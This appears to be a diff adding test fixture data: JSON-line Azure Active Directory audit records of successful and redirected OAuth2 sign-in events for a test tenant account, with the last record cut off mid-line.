+{"InterSystemsId": "3c5d16f4-16a6-45f4-a53d-abb86e35005b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:08", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f67a1615-4606-4673-b6fb-68f716345800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e11538ff-5fe1-4fdd-8c5d-219d85c47bb3"}
+{"InterSystemsId": "40077a75-7b58-4623-a64a-f1b7de70fa54", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:27", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e031670b-bb84-45ee-94ff-0e70a8cd1138"}
+{"InterSystemsId": "425503c9-ccbf-4674-8f1e-4d56510474fd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:54", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "57ef1056-6ce2-424a-b241-ce3939d00900", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d39944c4-6766-4a89-8d5a-c789175830ee"}
+{"InterSystemsId": "4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0c8fcffc-a810-4a85-b8e2-3a2fda925c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "6f2b7716-1acc-450d-ae13-afad7e02d07e"}
+{"InterSystemsId": "4542ce7e-270b-435e-8f81-ee23ea74be75", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9718abaa-220e-49c5-8c9b-588d32b8db00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "47f3c440-3fb7-4b5e-9c20-455470b289d2"}
+{"InterSystemsId": "4836e306-1460-4f34-ab55-a74c9a14f50d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:38:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2fde8302-c39e-40b6-9c7f-1bb9d4800a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5a3435d0-229a-41c8-bd21-b4f2b662d0f6"}
+{"InterSystemsId": "4a50a549-adf3-4a22-9037-7fd8cd3d0116", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1d856a16-b179-41ab-9c0d-af1d2b925100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5aff2d1c-b203-46a6-96f0-b8f908f0e968"}
+{"InterSystemsId": "4e44a55e-9c0d-4cea-b000-1b79e96dcf57", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fc33c54e-38b9-4ef2-a4ee-a3a324a45500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3d8033cf-eecd-4eee-87a5-795efd8a1d3d"}
+{"InterSystemsId": "4e91c3e1-819e-4ebc-ae68-2037cfc2db92", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:25", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "a063e495-5883-4837-8186-5828f9f2d500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8bd0a250-74f6-4eeb-ba20-c5bdbd977013"}
+{"InterSystemsId": "50d648cb-466d-4cf4-b2f8-3b7e84f47040", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:04", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "64613cae-510d-4a52-b486-070b775e5800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558"}
+{"InterSystemsId": "5a453031-0cc3-4577-a589-4c3bf37eed78", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "814a32f0-27fd-4e82-855c-13da15a4c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "19d57a4a-d32e-4dc6-971f-3491bc440023"}
+{"InterSystemsId": "5cd6215d-e206-4c3f-805d-6e386cbdab7a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9c218a27-ed51-4011-8383-e76850e85000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "0b158f74-e223-43c8-9cfd-5f4442f29fc7"}
+{"InterSystemsId": "612b339f-1088-a000-f25f-9c8af4d57894", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "00000003-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "4819a0c2-2050-4549-ab66-f5b90cbbcc5a"}
+{"InterSystemsId": "61eb5713-2687-4c00-a7b2-fde4788c395b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:29", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3db9a461-6dd1-4950-b3e3-fbe8c2d5c700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e94002d9-f6e8-46f9-8702-2a29e908e73d"}
+{"InterSystemsId": "61f81224-65fd-4c1b-b388-ee0e25485191", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "dc0cc415-9a00-470d-bda3-867e11fdd400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1ca4f684-3a34-44a8-99b8-064d1071768a"}
+{"InterSystemsId": "661f2330-3e04-483d-9781-caaa4543cc13", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "01c15486-46e2-487a-91f5-11445da0b600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2"}
+{"InterSystemsId": "68d7eaa4-aa57-4508-9792-09e80c911aa1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:42", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "0f698dd4-f011-4d23-a33e-b36416dcb1e6"}], "ObjectId": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1590b91f-bffe-4cd8-9028-de52692f5400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b290b902-b6f2-49f6-b7f8-ea1541d85c8c"}
+{"InterSystemsId": "6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:42:59", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "LogonError": "FlowTokenExpired", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", 